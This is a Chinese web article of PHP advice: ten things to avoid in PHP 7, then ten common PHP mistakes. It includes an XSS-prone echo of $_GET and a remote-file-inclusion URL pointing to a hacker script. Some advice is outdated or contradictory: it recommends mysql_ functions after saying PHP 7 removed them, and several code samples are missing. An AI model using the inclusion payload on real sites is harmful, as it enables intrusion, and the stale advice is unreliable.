在PHP7中不要做的10件事

　　PHP7于2015年10月正式發布，PHP7 ，將會是PHP腳本語言的重大版本更新，同時將帶來大幅的性能改進和新的特性，以及改進一些過時功能。 該發布版本將會專注在性能加強，源自PHP版本樹中的phpng分支。

　　1、不要使用 mysql_ 函數

　　這一天終于來了，從此你不僅僅“不應該”使用mysql_函數。PHP 7 已經把它們從核心中全部移除了，也就是說你需要遷移到好得多的mysqli_函數，或者更靈活的 PDO 實現。

　　2、不要編寫垃圾代碼

　　這一條可能易于理解，但是會變得越來越重要，因為 PHP 7 的速度提升可能會隱藏你的一些問題。不要僅僅滿足于你的站點速度，因為遷移到 PHP 7 才讓它變快。

　　為了理解速度有多重要，以及如何把事情做得更好，請看一看我們的文章速度優化入門指南。

　　作為一名開發者，你應該總是確保按需加載腳本，盡可能連接它們，編寫高效的數據庫查詢，盡可能使用緩存，以及其它。

　　3、不要在文件末尾使用 PHP 閉合標簽

　　你可以看一看，當一個文件以 PHP 代碼結尾時，WordPress 多數核心代碼都把末尾的 PHP 標簽去掉了。實際上，Zend 框架特別禁止了它。PHP 并不需要文件末尾的閉合標簽，并且我們可以通過去掉它來保證不會在后面添加任何的空白字符。

　　4、不要做不必要的引用傳遞

　　我個人不喜歡引用傳遞。我知道有時候它很實用，但是其它情況下它使代碼變得難懂，并且更難預測結果。

　　據說一些人認為它使代碼運行更快，但是根據一些 PHP 高級程序員所說，這并不正確。

　　說明引用為什么不好的一個例子是，PHP 內建了shuffle()和sort()。它們修改原始數組，而不是返回處理后的數組，這很不合邏輯。

　　5、不要在循環中執行查詢

　　在循環中執行查詢非常浪費。它給你的系統施加不必要的壓力，并且可能能夠在循環外部更快獲得相同結果。當我遇到需要這樣的情況時，我通常會使用兩個分離的查詢來解決問題，我會使用它們來構建數據數組。之后我會遍歷數組，并不需要在這個過程中執行查詢。

　　由于 WordPress 適用于這里，它可能有一些例外。雖然get_post_meta() 會從數據庫獲取大量數據，如果你正在遍歷某個特殊博文的元數據你可以在循環中使用它。這是因為當你第一次調用它的時候，WordPress實際上會獲取所有元數據并緩存它們。后續的調用使用這些緩存數據，沒有數據庫的調用。

　　弄懂這些的最佳方式是閱讀函數文檔，以及使用類似 Query Monitor 的工具。

　　6、不要在 SQL 查詢中使用*

　　當然，這個更像 MySQL 的問題，但是我們習慣在 PHP 中編寫 SQL 代碼，所以都差不多。無論如何，如果可以避免的話，不要在 SQL 查詢里使用通配符，尤其是數據庫有很多列的時候。

　　你應該明確指定需要哪些行，并且僅僅獲取它們。這有助于減少所用資源，保護數據，以及讓事情變得盡可能清晰。

　　對于 SQL，你需要了解所有可用的函數，并且盡可能測試其速度。在計算均值、求和或計算類似數值時，要使用 SQL 函數而不是 PHP 函數。如果你不確定某個查詢的速度，測試它并且嘗試一些其它的編譯 — 之后使用最好的那個。

　　7、不要信任用戶輸入

　　信任用戶輸入是不明智的。始終校驗、過濾、轉義、檢查并留好退路。用戶數據存在三個問題：我們開發者并沒有考慮每種可能性，它通常不正確，以及它可能是蓄意破壞。

　　經過周密考慮的系統可以防護這些威脅。要確保使用類似filter_var()的內建函數檢查適當的值，以及在處理數據庫時轉義(或預編譯)。

　　WordPress 擁有一些函數來解決問題。詳見文章校驗、轉義和過濾用戶數據。

　　8、不要故作聰明

　　你的目標應該是編寫優雅的代碼，來更清晰地表達你的意圖。你可能能夠通過將任何東西縮短為一個單詞的變量，使用多層的三元邏輯，以及其它手段，從每個頁面中優化 0.01 秒。但這只會給你和你周圍的人產生麻煩。

　　合理命名變量，為代碼編寫文檔，優先選擇清晰而不是簡潔。甚至還可以更好，使用標準的面向對象代碼，它本身或多或少就是文檔，不需要一大堆內聯數值。

　　9、不要重新發明輪子

　　PHP 到現在為止有很長時間了，網站被造出來的時間更長。很可能無論你需要造出什么，一些人之前早就造出來了。不要害怕向他人尋求支持，Github是你的好朋友，Composer也是，Packagist也是。

　　從日志工具到調色工具，從性能分析器到單元測試框架，從 Mailchimp API 到 Bootstrap，每個東西都可以通過按下按鍵(或者敲下命令)來獲取，使用它們吧!

　　10、不要忽略其它語言

　　如果你是個 PHP 程序員，現在有個好機會去至少了解 HTML、CSS、JavaScript 和 MySQL。當你能夠更好地處理這些語言時，就是重新學習 JavaScript 的時機了。JavaScript 并不是 jQuery，你應該合理地學習 JavaScript 來更高效地使用它。

　　我也打算向你推薦學習面向對象的 PHP，它可以節省時間，并且在代碼規模更大時會變得更好。對于類似 C# 和 Java 的語言，在你了解 OOP 之后，它們也更易于理解。

　　通過了解包管理器、構建腳本、CoffeeScript、LESS、SASS、YAML 、腳本引擎和其它強大的工具來擴展你的知識面。我強烈向你推薦看一看其它框架，尤其是 Laravel。

　　當你使用它們出色完成任務時，學習 Ruby、RoR、Android、iPhone 和 Windows Phone 應用開發如何?你可能會認為這毫無意義，因為它們在你的舒適區和工作所需范圍之外，但是這就是它們的意義。每種語言都有一些要學習的實用的東西，以及從沒碰到的新知識。所有 PHP 頂級開發者都懂得很多其它編程語言，這并非偶然。

　　php碼農最容易出現的10條錯誤：

　　1.不轉意html entities

　　一個基本的常識：所有不可信任的輸入（特別是用戶從form中提交的數據） ，輸出之前都要轉意。

　　echo $_GET[usename] ;

　　這個例子有可能輸出：

　　《script》/更改admin密碼的腳本或設置cookie的腳本/《script》

　　這是一個明顯的安全隱患，除非你保證你的用戶都正確的輸入。

　　如何修復 ：

　　我們需要將"< ",">","and" 等轉換成正確的HTML表示(< , >, and ")，函數htmlspecialchars 和 htmlentities()正是干這個活的。

　　正確的方法：

　　echo htmlspecialchars($_GET[username], ENT_QUOTES);

　　2. 不轉意SQL輸入

　　我曾經在一篇文章中最簡單的防止sql注入的方法(php+mysql中)討論過這個問題并給出了一個簡單的方法 。有人對我說，他們已經在php.ini中將magic_quotes設置為On，所以不必擔心這個問題，但是不是所有的輸入都是從$_GET, $_POST或 $_COOKIE中的得到的！

　　如何修復：

　　和在最簡單的防止sql注入的方法(php+mysql中)中一樣我還是推薦使用mysql_real_escape_string()函數

　　正確做法：

　　3.錯誤的使用HTTPheader 相關的函數: header(), session_start(), setcookie()

　　遇到過這個警告嗎?"warning: Cannot add header information headers already sent [....]

　　每次從服務器下載一個網頁的時候，服務器的輸出都分成兩個部分：頭部和正文。

　　頭部包含了一些非可視的數據，例如cookie。頭部總是先到達。正文部分包括可視的html，圖片等數據。

　　如果output_buffering設置為Off，所有的HTTPheader相關的函數必須在有輸出之前調用。問題在于你在一個環境中開發，而在部署到另一個環境中去的時候，output_buffering的設置可能不一樣。結果轉向停止了，cookie和session都沒有正確的設置........。

　　如何修復:

　　確保在輸出之前調用httpheader相關的函數，并且令output_buffering = Off。

　　4. Require 或 include 的文件使用不安全的數據

　　再次強調：不要相信不是你自己顯式聲明的數據。不要 Include 或 require 從$_GET, $_POST 或 $_COOKIE 中得到的文件。

　　例如:

　　index.php

　　現在任一個黑客現在都可以用:http://www.yourdomain.com/index.php?filename=anyfile.txt來獲取你的機密信息，或執行一個PHP腳本。

　　如果allow_url_fopen=On，你更是死定了：

　　試試這個輸入：http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php

　　現在你的網頁中包含了http://www.youaredoomed.com/phphack.php的輸出. 黑客可以發送垃圾郵件，改變密碼，刪除文件等等。只要你能想得到。

　　如何修復：

　　你必須自己控制哪些文件可以包含在的include或require指令中。

　　5. 語法錯誤

　　語法錯誤包括所有的詞法和語法錯誤，太常見了，以至于我不得不在這里列出。解決辦法就是認真學習PHP的語法，仔細一點不要漏掉一個括號，大括號，分號，引號。還有就是換個好的編輯器，就不要用記事本了！

　　6.很少使用或不用面向對象

　　很多的項目都沒有使用PHP的面向對象技術，結果就是代碼的維護變得非常耗時耗力。PHP支持的面向對象技術越來越多，越來越好，我們沒有理由不使用面向對象。

　　7. 不使用framework

　　95% 的PHP項目都在做同樣的四件事: Create, edit, list 和. 現在有很多MVC的框架來幫我們完成這四件事，我們為何不使用他們呢？

　　8. 不知道PHP中已經有的功能

　　PHP的核心包含很多功能。很多程序員重復的發明輪子。浪費了大量時間。編碼之前搜索一下PHP mamual，在google上檢索一下，也許會有新的發現！PHP中的exec()是一個強大的函數，可以執行cmd shell，并把執行結果的最后一行以字符串的形式返回。考慮到安全可以使用EscapeShellCmd()

　　9.使用舊版本的PHP

　　很多程序員還在使用PHP4，在PHP4上開發不能充分發揮PHP的潛能，還存在一些安全的隱患。轉到PHP5上來吧，并不費很多功夫。大部分PHP4程序只要改動很少的語句甚至無需改動就可以遷移到PHP5上來。根據http://www.nexen.net的調查 只有12%的PHP服務器使用PHP5，所以有88%的PHP開發者還在使用PHP4.

　　10.對引號做兩次轉意

　　見過網頁中出現\或\"嗎？這通常是因為在開發者的環境中magic_quotes 設置為off，而在部署的服務器上magic_quotes =on. PHP會在 GET, POST 和 COOKIE中的數據上重復運行addslashes() 。

　　原始文本：

　　Its a string magic quotes on : It\s a string 又運行一次 addslashes(): It\\s a string HTML輸出: It\s a string

　　還有一種PHP程序員最容易出現錯誤的情況就是，用戶一開始輸入了錯誤的登錄信息，服務器檢測到錯誤輸入后，輸出同樣的form要求用戶再次輸入，導致用戶的輸入轉意兩次！

【在PHP7中不要做的10件事】相關文章：

環境評價要做什么07-09

音響師需要做哪些工作02-01

成語中的名人故事（通用10篇）12-26

淘寶美工都需要做些什么01-09

哪些人群需要做基因檢測10-20

物流師主要做是什么的09-20

考編導專業都需要做哪些準備10-29

演講不緊張技巧09-03

初三中考備考計劃（精選10篇）06-09

2024年中元節的10大禁忌08-21